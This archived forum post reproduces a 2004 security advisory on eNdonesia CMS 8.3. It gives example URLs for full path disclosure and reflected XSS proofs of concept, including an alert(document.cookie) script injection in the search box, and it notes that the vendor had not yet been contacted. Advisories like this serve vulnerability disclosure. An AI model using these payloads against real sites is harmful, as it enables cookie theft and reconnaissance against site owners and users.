hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Multiple Vulnerabilities In Endonesia Cms
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Aug 4 2004, 07:21 PM
QUOTE



              Multiple vulnerabilities in eNdonesia CMS ---------------------------------------------------------------------------

Author: y3dips
Date: August, 2th 2004
Location: Indonesia, Jakarta
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eNdonesia is a freeware content management system, written in php by Nurcholis.

Homepage: http://www.endonesia.net/

download at : http://www.sourceforge.net/projects/endonesia

Version :
tested on endonesia 8.3
not tested on other/older version but it is possible be the same

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

A1. - all scripts in "mod.php" files are not protected against direct access

Example:

http://localhost/endon/mod.php?mod=1

... and we will see standard php error messages, revealing full path to script:

Warning: main(./mod/1/index.php): failed to open stream: \
No such file or directory in /var/www/html/endon/mod.php on line 3

Warning: main(): Failed opening './mod/1/index.php' for inclusion \
(include_path='.:/usr/share/pear') in /var/www/html/endon/mod.php on line 3

A2.

Example:

http://localhost/endon/mod.php?mod=publish...b%3Etest%3C/b%3

... and we will see standard mysql error messages, revealing full path to script
in module because input character:

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=[your chararter]

warning :

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource
in /var/www/html/endon/mod/publisher/publisher.php on line 101



B. Cross-site scripting aka XSS:

eNdonesia has built-in filtering against XSS exploits, so additional measures must be used
for successful cross-site scripting.

B1 - XSS through unsanitaized user submitted variable in mod.php

http://localhost/endon/mod.php?mod=[XSS Code here]publisher&op=viewcat&cid=1

POC : http://localhost/endon/mod.php?mod=%3Ch1%3...ewcat&cid=dudul

then the warning is

Warning: main(./mod/

test

Epublisher/index.php): failed to open stream: \
No such file or directory in /var/www/html/endon/mod.php on line 3 .

..... with "test" in <h1> format

B2. Session ID at search box

http://localhost/endon/mod.php?mod=publish...p=search&query=

POC :

http://localhost/endon/mod.php?mod=publish...e)%3C/script%3E

or in search box, input &lt;script&gt;alert(document.cookie)&lt;/script&gt;

---------------------------------------------------------------------------
The fix:
~~~~~~~~
Vendor not contacted yet
but i ll post it to them later

---------------------------------------------------------------------------



Source: http://seclists.org/lists/bugtraq/2004/Aug/0039.html
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.